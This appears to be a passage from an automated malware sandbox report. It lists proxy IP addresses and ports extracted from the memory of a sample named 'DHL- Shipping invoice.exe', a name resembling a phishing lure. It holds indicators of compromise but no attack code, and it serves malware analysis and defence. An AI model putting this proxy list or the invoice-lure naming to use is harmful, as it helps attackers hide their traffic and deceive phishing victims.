                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.217.158.202:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.216.6
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.216.68:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.216.68:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.217.3:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.217.3:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.103.66.15
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.103.66.15://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.118.80.244:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.118.80.244:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.208.12.35:20986
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.208.12.35:20986://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.48.7.43
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.48.7.43://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.48.7.43:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9822C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.154:28633://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.154:47344
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.154:47344://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:16216://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:53129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:53129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61344
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61344://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.200.27:23456
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.200.27:23456://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.201.151:15745
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.201.151:15745://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.89.101.60
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.89.101.60://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.89.101.60:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.89.101.62
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.89.101.62://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.89.101.62:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.137.39.241:19000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.137.39.241:19000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.235.28.229:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.235.28.229:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.235.31.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.235.31.24:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.235.31.24:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.237.28.191:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.237.28.191:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.37.132.129:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.37.132.129:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.68.111.73:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.68.111.73:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.77.64.116:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.77.64.116:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.92.245.34:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.92.245.34:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981F5F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.128.81.220:31623
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.128.81.220:31623://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.128.81.220:44286
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.128.81.220:44286://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.188.81.57:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.188.81.57:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.28.152.111
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.28.152.111://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.28.152.111:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.28.152.113
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.28.152.113://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.28.152.113:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98344F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.47.103.89:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.47.103.89:8080://proxy8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.101.55.161:53281
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.101.55.161:53281://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.112.97:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.112.97:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.119.209:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.119.209:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.196.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.196.145:8081
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.196.145:8081://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.201.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.201.235:8081
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.201.235:8081://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.52.252:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.52.252:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.122.230.20:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.122.230.20:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.141.160.83:15160
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.141.160.83:15160://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981766000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.134.50.79:10705
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.134.50.79:10705://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.142.3.145:3306
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.142.3.145:3306://proxyx
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.146.206.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.146.206.215:8090
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.146.206.215:8090://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.209.255.13:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.209.255.13:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.58.56
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.58.56://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.58.56:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981EB6000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.8.157:19002
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.8.157:19002://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:4506
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:4506://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:7779
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:7779://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.218.100.120:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.218.100.120:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.218.205.195:5555
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.218.205.195:5555://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.152.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.152.222:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.152.222:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.152.158:55555
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.152.158:55555://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.175.210:50554
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.175.210:50554://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.239.209
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.239.209://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.239.209:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980109000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.242.178.5:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.242.178.5:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.39.228.193:39593
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.39.228.193:39593://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.39.228.25:39593
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.39.228.25:39593://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.169.243.234:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.169.243.234:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.191.169.79:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.191.169.79:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.228.235.6
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.228.235.6://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.228.235.6:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.240.202.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.240.202.218:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.240.202.218:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.249.112.162
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.249.112.162://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.249.112.162:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98175A000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.51.7.66:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.51.7.66:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.65.28.57
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.65.28.57:30924
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.65.28.57:30924://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.65.28.57:30962
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.65.28.57:30962://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.72.68.247:8082
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.72.68.247:8082://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.72.68.247:8082p
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.78.64.70:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.78.64.70:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9820B3000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.78.64.70:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.78.64.70:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.84.176.110:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.91.125.238:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.91.125.238:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.119.171:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.119.171:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.124.50:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.124.50:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9806FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.16.1.71:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.16.1.71:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.16.245.179:53281://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.162.198.6:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.162.198.6:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.199.14.14:1088
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.199.14.14:1088://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.199.14.17:1088
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.199.14.17:1088://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.43.68.47:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.43.68.47:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.44.83.70:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.91.139.76
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.91.139.76://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.91.139.76:80
